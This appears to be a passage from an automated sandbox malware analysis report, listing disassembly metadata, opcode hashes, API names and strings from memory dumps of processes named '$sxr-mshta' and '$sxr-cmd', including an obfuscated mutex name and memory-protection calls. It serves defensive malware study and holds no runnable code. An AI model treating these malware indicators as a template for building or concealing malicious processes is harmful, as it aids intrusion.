                                                                                                             • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2882836952-0
                                                                                                            • Opcode ID: 09a1da4ea647e200bc3592a5ab7a7466c61b6a393229a681a1c2ded621564b7f
                                                                                                            • Instruction ID: 251089c3425067a83f03d0e059806dcf44cfdc876c4d586d8a52af57f1c8afba
                                                                                                            • Opcode Fuzzy Hash: 09a1da4ea647e200bc3592a5ab7a7466c61b6a393229a681a1c2ded621564b7f
                                                                                                            • Instruction Fuzzy Hash: 5402E032219B808AE760CF59F45439ABBA0F3C5795F104115EB8E97BA9DF7CC494CB41
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                             • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 2210144848-0
                                                                                                            • Opcode ID: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
                                                                                                            • Instruction ID: f86b0c21a1988d1b447e3df4ea652d7f1e7401274a066c733c608cff726f6858
                                                                                                            • Opcode Fuzzy Hash: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
                                                                                                            • Instruction Fuzzy Hash: A88104327166448CFB129F6CC8503ED2FA1F756B8AF458119DE0E7B796DB348882C392
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                             • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2882836952-0
                                                                                                            • Opcode ID: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
                                                                                                            • Instruction ID: 3881b159e52fa2847ddae10ec326ef446fa70dd60557a96e19fd9e5b3467f696
                                                                                                            • Opcode Fuzzy Hash: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
                                                                                                            • Instruction Fuzzy Hash: 4F61303261AB80CBEB64CB19E44039A7BE0F389746F105116EA8D57BA9DB7CC550CF81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _set_statfp
                                                                                                            • String ID:
                                                                                                            • API String ID: 1156100317-0
                                                                                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                            • Instruction ID: a9d352d0960d56c33294a89242783f0a41a3526790df0315ca3bd5c72a0722b4
                                                                                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                            • Instruction Fuzzy Hash: 3B11A732B55B0509FA5A136ED4553E51940BB77372F14C634BA6F363D6CB2848C163C3
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380536847.000001ACE9000000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001ACE9000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1ace9000000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _set_statfp
                                                                                                            • String ID:
                                                                                                            • API String ID: 1156100317-0
                                                                                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                            • Instruction ID: df60be486fa03a822db36ac1cc4ec4760dd7791901d6f8e5baa2a5e0eaef6986
                                                                                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                            • Instruction Fuzzy Hash: 8611A333B56E0101FAEC11EBE4913E99C70AB5F374FC80624AA67C6EDE8A148C416283
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1452528299-0
                                                                                                            • Opcode ID: afeb0ab3ae9b140264ba62f65efacef86e232e555d1866a57a7faeca2321756a
                                                                                                            • Instruction ID: afedb49b93f5282fbd0f4f08ce41f77d5cf9362e5f64a08a9f6af3aaa3c330e6
                                                                                                            • Opcode Fuzzy Hash: afeb0ab3ae9b140264ba62f65efacef86e232e555d1866a57a7faeca2321756a
                                                                                                            • Instruction Fuzzy Hash: AF116A757032414EFE159B2D98007D52A51AB8A7A2F184A24E92D37FD7DE38D84287C2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 1092925422-0
                                                                                                            • Opcode ID: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
                                                                                                            • Instruction ID: 4063ca973c83d04121031b10890a0ed723de865bbbfc7d02c7fc40f0a1be5d69
                                                                                                            • Opcode Fuzzy Hash: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
                                                                                                            • Instruction Fuzzy Hash: 17118F36706B4087EB24CB2AE4442DABBB0F746B82F048029DE8C13795EF7DC948C781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380536847.000001ACE9000000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001ACE9000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1ace9000000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                            • String ID: csm$f
                                                                                                            • API String ID: 3242871069-629598281
                                                                                                            • Opcode ID: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
                                                                                                            • Instruction ID: b2b64304aebdacbabd4f642863a7f83068d0cb70c11fe1ca55ac9618cc19312c
                                                                                                            • Opcode Fuzzy Hash: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
                                                                                                            • Instruction Fuzzy Hash: 4051E6367136008BEB54CF55D404BDDBB95F34AB88F918920DE5A87788EBB6C981C782
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380536847.000001ACE9000000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001ACE9000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1ace9000000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                            • String ID: csm$f
                                                                                                            • API String ID: 3242871069-629598281
                                                                                                            • Opcode ID: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
                                                                                                            • Instruction ID: 94726f2286672b7ec900405ff3bbb1d2fecaa7b73b9066aabf2ede55ddb5762d
                                                                                                            • Opcode Fuzzy Hash: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
                                                                                                            • Instruction Fuzzy Hash: F331B33230274096E714DF56E8447D9BBA4F34ABC8F858414EE9687784CB79C940CB86
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileType
                                                                                                            • String ID: \\.\pipe\
                                                                                                            • API String ID: 3081899298-91387939
                                                                                                            • Opcode ID: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
                                                                                                            • Instruction ID: 319b0697934bad70bd6088f9d4e5e7c155fd0ae2c7668c7ed188eec6fbc58b31
                                                                                                            • Opcode Fuzzy Hash: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
                                                                                                            • Instruction Fuzzy Hash: 2271CF327027804AEB249F2EDA453EE6B90F786786F554016DE4D63B9ADF35CA00C782
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileType
                                                                                                            • String ID: \\.\pipe\
                                                                                                            • API String ID: 3081899298-91387939
                                                                                                            • Opcode ID: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
                                                                                                            • Instruction ID: 7e63f0771d7215c13fc66341b7d4fb5c2d4d0b5ab73bcee7ba6e6331ea733ea4
                                                                                                            • Opcode Fuzzy Hash: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
                                                                                                            • Instruction Fuzzy Hash: 8651053230A3D14AFA359B2DA1447EE6F91F797782F065025DE8D23B9BCA39C50187C2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                            • String ID: U
                                                                                                            • API String ID: 442123175-4171548499
                                                                                                            • Opcode ID: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
                                                                                                            • Instruction ID: 268954b8612093be874be9a8247c3e032634363a72549ea68396d1a34a35c881
                                                                                                            • Opcode Fuzzy Hash: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
                                                                                                            • Instruction Fuzzy Hash: 4E410C3231AA4095EB11CF29E4443DA7BA0F749795F418121DE4D97798DF3CC542CB81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 000001ACEA2D2A4D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleMutexOpen
                                                                                                            • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                            • API String ID: 3128266590-3670590667
                                                                                                            • Opcode ID: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
                                                                                                            • Instruction ID: f61167e2651820de8591d07a720a3934170979ca94e3cffa0351caf0fc8d3f49
                                                                                                            • Opcode Fuzzy Hash: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
                                                                                                            • Instruction Fuzzy Hash: 9021D3363067408AE775CB1AB84079ABBA0F796B82F468019DE8D67755EF34C885C781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 000001ACEA2D2B39
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleMutexOpen
                                                                                                            • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                            • API String ID: 3128266590-3670590667
                                                                                                            • Opcode ID: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
                                                                                                            • Instruction ID: 43131cdc840e7214e32c2703c3ce4f9ce2929e2c21a5b1eef7140ca923e83d80
                                                                                                            • Opcode Fuzzy Hash: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
                                                                                                            • Instruction Fuzzy Hash: 882104327017408AE760DF1EB84079E7BA2F78AB42F468025DE8CA3755EF74C486C781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
Similarity
• API ID: Stringtry_get_function
• String ID: LCMapStringEx
• API String ID: 2588686239-3893581201
• Opcode ID: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
• Instruction ID: 16a0683443718a9d4b00cb92a0636272508c9588a9dca63bfcf66a1a8a2c8b52
• Opcode Fuzzy Hash: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
• Instruction Fuzzy Hash: 10111F35709BC08AD761CB1AF44069ABBA4F7CAB81F548115EECD93B59DF38C4508B80
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
• Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
• Instruction ID: acdbfa7475188e3bd5fd23afba0984237a40c88ef4739296bb2d9f40457d536d
• Opcode Fuzzy Hash: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
• Instruction Fuzzy Hash: F0115132215B4086EB118F29F4403997BA1F789B95F188620EF8D17B65DF3DC555C740
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
• Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
Similarity
• API ID: CountCriticalInitializeSectionSpintry_get_function
• String ID: InitializeCriticalSectionEx
• API String ID: 539475747-3084827643
• Opcode ID: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
• Instruction ID: e81a5d312564488f4778b9a82c6d453bf304c095f630db13c3ae49f3ed1ab847
• Opcode Fuzzy Hash: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
• Instruction Fuzzy Hash: 84F0E235B02B8096FB068B4DF4006D82A60FF89B92F44C062E95D23B15CF38C8C4C7C2
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
• Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
Similarity
• API ID: Valuetry_get_function
• String ID: FlsSetValue
• API String ID: 738293619-3750699315
• Opcode ID: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
• Instruction ID: 4a713e8bead376a6cf45cf616d1204bcb9d4c535a8f3a30230fff1d5908b58b8
• Opcode Fuzzy Hash: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
• Instruction Fuzzy Hash: 76E09B71703A409AEF065B5DF8006D42B61BB8A782F48C026D92D16355CF38C8D4C7C2
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
• Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
• Instruction ID: 16cef19a75897a972722d17d6cca093052f09fdebf5c941e974c304b5546d580
• Opcode Fuzzy Hash: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
• Instruction Fuzzy Hash: 0E219232706B8089EB118F5EE40429AB7A1FB89BD6F048015DE8D57B25EF78C4829780
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
• Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
• Instruction ID: 9b446fd1866a1343f7f87fa1f1a8520396ec9a9a932a91b1f8be0d0211b8919e
• Opcode Fuzzy Hash: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
• Instruction Fuzzy Hash: 28E06D727026049AF7058F66D8043993AE1FB8AF03F48C02CC90D0B350EF7D84D98781
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 3.2%
Dynamic/Decrypted Code Coverage: 45.8%
Signature Coverage: 0%
Total number of Nodes: 96
Total number of Limit Nodes: 14
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
• String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
• API String ID: 3305344409-4288247545
• Opcode ID: 24339b1bae00977a6506967ece6ae207caf9a892aecb19933cb35f9f7a921b2b
• Instruction ID: 7a69f4c664ca89d52866e19e0e15265f70ebe1e20738c96192914093129166a7
• Opcode Fuzzy Hash: 24339b1bae00977a6506967ece6ae207caf9a892aecb19933cb35f9f7a921b2b
• Instruction Fuzzy Hash: C042A621A09E8285EB90BB15A8902B9E7A4FF4D7B4FC44234D92E677D4DF3DE54D8320
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcschr$Heap$AllocateProcessiswspacememsettowlowerwcsrchr
                                                                                                            • String ID: :$:$:$:ON$OFF
                                                                                                            • API String ID: 4076514806-467788257
                                                                                                            • Opcode ID: a729f565638991cd54cf916fc6f5128fd08837229019dbdabd8178241c992b90
                                                                                                            • Instruction ID: 315560bd00ae74524552954ef10515e2b587430dc94a303fb58df3e7541079c0
                                                                                                            • Opcode Fuzzy Hash: a729f565638991cd54cf916fc6f5128fd08837229019dbdabd8178241c992b90
                                                                                                            • Instruction Fuzzy Hash: 4522AE21A08A4286FBE4BB259494279E695FF4DBA0FC88135D91E77394DF7DA84CC330
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale$DefaultLangUsersetlocale
                                                                                                            • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                            • API String ID: 2492766124-2236139042
                                                                                                            • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                            • Instruction ID: 53840515e09884be2b56b16b235a767172716bb8ffffbcf102adacff88670abb
                                                                                                            • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                            • Instruction Fuzzy Hash: A6F16E61B08B46C6EF91AF15D5802B9A2A8BF08BA0FD44135CA2D67794EF3DE51DC370
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            Similarity
                                                                                                            • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                                            • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                                            • API String ID: 388421343-2905461000
                                                                                                            • Opcode ID: f6b3c8864cfcf0a5a2ea0a822c104307c370158276e02494081153d262952e71
                                                                                                            • Instruction ID: a0b3f9742eb934209e109a35df36554d01658bc43b2dfac460494c2e2e7210d4
                                                                                                            • Opcode Fuzzy Hash: f6b3c8864cfcf0a5a2ea0a822c104307c370158276e02494081153d262952e71
                                                                                                            • Instruction Fuzzy Hash: 7AF12E32A18E8286EBA0AB15E4847B9F7A4FB89760F804135D95D63B54DF3DE45CCB30
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            Similarity
                                                                                                            • API ID: QueryValue$CloseOpensrandtime
                                                                                                            • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                            • API String ID: 145004033-3846321370
                                                                                                            • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                            • Instruction ID: 6a5c554f00657b799540ee2442ef6b7b301015c101efa10fae6a8aedecfd4aa8
                                                                                                            • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                            • Instruction Fuzzy Hash: 47E1903252CE82C6E7D0AB10E48057AF7A4FB89764FC05136EA8E62A54DF7DD55CCB20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            Similarity
